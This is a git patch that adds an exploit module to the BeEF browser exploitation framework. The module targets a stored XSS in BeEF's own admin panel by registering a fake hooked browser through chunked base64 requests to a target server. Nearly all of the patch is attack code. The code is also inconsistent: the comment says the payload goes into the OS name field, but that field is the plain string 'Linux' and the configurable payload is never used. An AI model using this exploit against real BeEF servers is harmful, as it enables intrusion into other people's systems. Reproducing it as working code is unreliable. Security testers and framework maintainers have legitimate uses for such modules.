From 2080cf5b0d50aaea39e28a701d4485d7f42245c3 Mon Sep 17 00:00:00 2001 From: zinduolis Date: Wed, 21 Jan 2026 09:38:50 +1000 Subject: [PATCH] add module for admin panel xss --- .../exploits/beef_admin_panel_xss/command.js | 167 ++++++++++++++++++ .../exploits/beef_admin_panel_xss/config.yaml | 15 ++ .../exploits/beef_admin_panel_xss/module.rb | 17 ++ 3 files changed, 199 insertions(+) create mode 100644 modules/exploits/beef_admin_panel_xss/command.js create mode 100644 modules/exploits/beef_admin_panel_xss/config.yaml create mode 100644 modules/exploits/beef_admin_panel_xss/module.rb diff --git a/modules/exploits/beef_admin_panel_xss/command.js b/modules/exploits/beef_admin_panel_xss/command.js new file mode 100644 index 000000000..10318f560 --- /dev/null +++ b/modules/exploits/beef_admin_panel_xss/command.js @@ -0,0 +1,167 @@ +// +// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - https://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + var target_beef_url = "<%= @target_beef_url %>"; + var xss_payload = "<%= @xss_payload %>"; + + // Generate a random session ID (80 characters, uppercase + digits) + function generateHookId() { + var chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'; + var result = ''; + for (var i = 0; i < 80; i++) { + result += chars.charAt(Math.floor(Math.random() * chars.length)); + } + return result; + } + + // Get current timestamp in milliseconds + function ts() { + return Date.now(); + } + + // Split string into chunks + function chunkString(str, length) { + var chunks = []; + for (var i = 0; i < str.length; i += length) { + chunks.push(str.substring(i, i + length)); + } + return chunks; + } + + // Base64 encode (using browser's btoa) + function b64encode(str) { + return btoa(str); + } + + var HOOK = generateHookId(); + + // Build the malicious payload - XSS is injected into host.os.name + var malicious_os_name = 'Linux'; + + var browser_data = [{ + "cid": 0, + "results": { + "browser.window.cookies": "BEEFHOOK=" + HOOK, + "browser.name": "FFAA", + "browser.version": "146.0", + "browser.engine": "Gecko", + "browser.name.reported": "Mozilla/5.0 (X11; Linux x86_64; rv:146.0) Gecko/20100101 Firefox/146.0", + "browser.platform": "Linux x86_64", + "browser.language": "en-US", + "browser.plugins": "PDF Viewer-v.undefined", + "browser.window.title": "Unknown", + "browser.window.origin": "http://exploited-host:8000", + "browser.window.hostname": "exploited-host", + "browser.window.hostport": "8000", + "browser.window.uri": "http://exploited-host:8000/victim.html", + "browser.window.referrer": "http://exploited-host:8000/victim.html", + "browser.window.size.width": 1678, + "browser.window.size.height": 168, + "browser.date.datestamp": new Date().toString(), + "host.os.name": malicious_os_name, + "host.os.family": "Linux", + "host.os.arch": 64, + "host.software.defaultbrowser": "Unknown", + "hardware.type": "Unknown", + "hardware.memory": "unknown", + "hardware.gpu": "unknown", + "hardware.gpu.vendor": "unknown", + "hardware.cpu.arch": "x86_64", + "hardware.cpu.cores": 32, + "hardware.battery.chargingstatus": "unknown", + "hardware.battery.level": "unknown", + "hardware.battery.chargingtime": "unknown", + "hardware.battery.dischargingtime": "unknown", + "hardware.screen.size.width": 5120, + "hardware.screen.size.height": 2160, + "hardware.screen.colordepth": 24, + "hardware.screen.touchenabled": "No", + "browser.capabilities.vbscript": "No", + "browser.capabilities.flash": "No", + "browser.capabilities.silverlight": "No", + "browser.capabilities.phonegap": "No", + "browser.capabilities.websocket": "Yes", + "browser.capabilities.webrtc": "No", + "browser.capabilities.webworker": "Yes", + "browser.capabilities.webgl": "No", + "browser.capabilities.googlegears": "No", + "browser.capabilities.activex": "No", + "browser.capabilities.quicktime": "No", + "browser.capabilities.realplayer": "No", + "browser.capabilities.wmp": "No", + "browser.capabilities.vlc": "No", + "HookSessionID": HOOK + }, + "status": 0, + "handler": "/init" + }]; + + var encoded_data = b64encode(JSON.stringify(browser_data)); + var chunks = chunkString(encoded_data, 383); + + beef.debug("[BeEF Admin Panel XSS] Sending malicious hook registration to: " + target_beef_url); + beef.debug("[BeEF Admin Panel XSS] Generated Hook ID: " + HOOK); + beef.debug("[BeEF Admin Panel XSS] Payload chunks: " + chunks.length); + + var requests_sent = 0; + var requests_completed = 0; + var total_requests = (2 * chunks.length) + 2; // 2 rounds of chunks + hook.js + final dh + + function checkComplete() { + if (requests_completed >= total_requests) { + beef.net.send("<%= @command_url %>", <%= @command_id %>, + "result=Exploit sent successfully. Fake browser registered with Hook ID: " + HOOK + + ". XSS will trigger when admin hovers over the browser entry in the Hooked Browsers list.", + beef.are.status_success()); + } + } + + // Send chunks for session IDs 1 and 2 + for (var sid = 1; sid <= 2; sid++) { + for (var idx = 0; idx < chunks.length; idx++) { + (function(s, i, chunk) { + var url = target_beef_url + "/dh?bh=" + HOOK + "&sid=" + s + "&pid=" + (i + 1) + "&pc=" + chunks.length + "&d=" + encodeURIComponent(chunk) + "&_=" + ts(); + var img = new Image(); + img.onload = img.onerror = function() { + requests_completed++; + checkComplete(); + }; + img.src = url; + requests_sent++; + })(sid, idx, chunks[idx]); + } + } + + // Send hook.js request after a short delay + setTimeout(function() { + var hookUrl = target_beef_url + "/hook.js?BEEFHOOK=" + HOOK + "&_=" + ts(); + var img2 = new Image(); + img2.onload = img2.onerror = function() { + requests_completed++; + checkComplete(); + }; + img2.src = hookUrl; + requests_sent++; + + // Send final dh request + setTimeout(function() { + var finalChunk = chunks[chunks.length - 1] || ""; + var finalUrl = target_beef_url + "/dh?bh=" + HOOK + "&sid=3&pid=1&pc=1&d=" + encodeURIComponent(finalChunk) + "&_=" + ts(); + var img3 = new Image(); + img3.onload = img3.onerror = function() { + requests_completed++; + checkComplete(); + }; + img3.src = finalUrl; + requests_sent++; + }, 100); + }, 500); + + beef.debug("[BeEF Admin Panel XSS] Initiated " + requests_sent + " requests"); + +}); diff --git a/modules/exploits/beef_admin_panel_xss/config.yaml b/modules/exploits/beef_admin_panel_xss/config.yaml new file mode 100644 index 000000000..ecdd537e8 --- /dev/null +++ b/modules/exploits/beef_admin_panel_xss/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - https://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + beef_admin_panel_xss: + enable: true + category: "Exploits" + name: "BeEF Admin Panel XSS" + description: "This module exploits a Stored XSS vulnerability in the BeEF Admin Panel's Hooked Browsers tooltip. It registers a fake hooked browser with a malicious OS name containing JavaScript payload. When the BeEF administrator hovers over the fake browser entry, the XSS payload executes.

This can be used to test if a target BeEF instance is running a vulnerable version." + authors: ["radsec"] + target: + working: ["ALL"] diff --git a/modules/exploits/beef_admin_panel_xss/module.rb b/modules/exploits/beef_admin_panel_xss/module.rb new file mode 100644 index 000000000..c5753dc76 --- /dev/null +++ b/modules/exploits/beef_admin_panel_xss/module.rb @@ -0,0 +1,17 @@ +# +# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - https://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Beef_admin_panel_xss < BeEF::Core::Command + def self.options + [ + { 'name' => 'target_beef_url', 'ui_label' => 'Target BeEF URL', 'value' => 'http://localhost:3000', 'width' => '300px' }, + { 'name' => 'xss_payload', 'ui_label' => 'XSS Payload (JavaScript)', 'value' => "alert('BeEF XSS - Vulnerable!')", 'width' => '400px' } + ] + end + + def post_execute + save({ 'result' => @datastore['result'] }) + end +end